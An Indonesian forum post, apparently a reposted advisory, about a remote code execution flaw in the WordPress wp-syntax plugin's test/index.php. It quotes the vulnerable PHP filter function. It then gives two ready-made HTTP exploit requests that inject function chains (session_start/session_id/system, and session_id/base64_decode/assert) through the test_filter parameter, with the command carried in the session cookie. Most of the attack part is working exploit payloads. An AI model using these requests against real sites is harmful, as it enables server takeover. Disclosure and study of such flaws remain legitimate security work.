Admin- Senior
- Jumlah posting : 81
Reputation : 0
Join date : 07.04.10
Age : 28
Lokasi : Gunungkidul
by Admin Sun 11 Apr 2010 - 4:12
- Code:
titik kelamahan/bugs terdapat pada code test/index.php@132-150:
...
function apply_filters($tag, $string)
{
global $test_filter;
if (!isset($test_filter[$tag])) return $string;
uksort($test_filter[$tag], "strnatcasecmp");
foreach ($test_filter[$tag] as $priority => $functions)
{
if (is_null($functions)) continue;
foreach($functions as $function)
{
$string = call_user_func_array($function, array($string));
}
}
return $string;
}
...
Keterangan:
Global variable test_filter is not defined, so register_globals = on
makes it possible to pass arbitrary value into the first parameter of
call_user_func_array(). Considering the fact that this function is
called in a loop and the returned value is assinged to the second parameter
on every iteration, it is obvious that user function can be called with
a single parameter containing arbitrary data that can come from the
environment, e.g. session id. There are several valid sequences of function
calls that let execute any code.
==============================[1]=====================================
GET /wp-content/plugins/wp-syntax/test/index.php?test_filter[wp_head][99][0]=session_start&test_filter[wp_head][99][1]=session_id&test_filter[wp_head][99][2]=system HTTP/1.0
Host: localhost
Cookie: PHPSESSID=dir
Connection: close
Initially session_start() is called, then the return value of session_id() that
contains command to execute passes to system().
==============================[2]=====================================
/wp-content/index.php?test_filter[wp_head][99][]=session_start&test_filter[wp_head][99][0]=session_id&test_filter[wp_head][99][1]=base64_decode&test_filter[wp_head][99][2]=assert&q=phpinfo();exit;
This vector was found by ShAnKaR and improves the previous one by using
base64-encoded payload that broadens the char range that can be passed
to the next function. Besides, assert() successfully executes arbitrary
code being called in call_user_func_array() while the usage of eval() in
this function is not possible.
Indeks
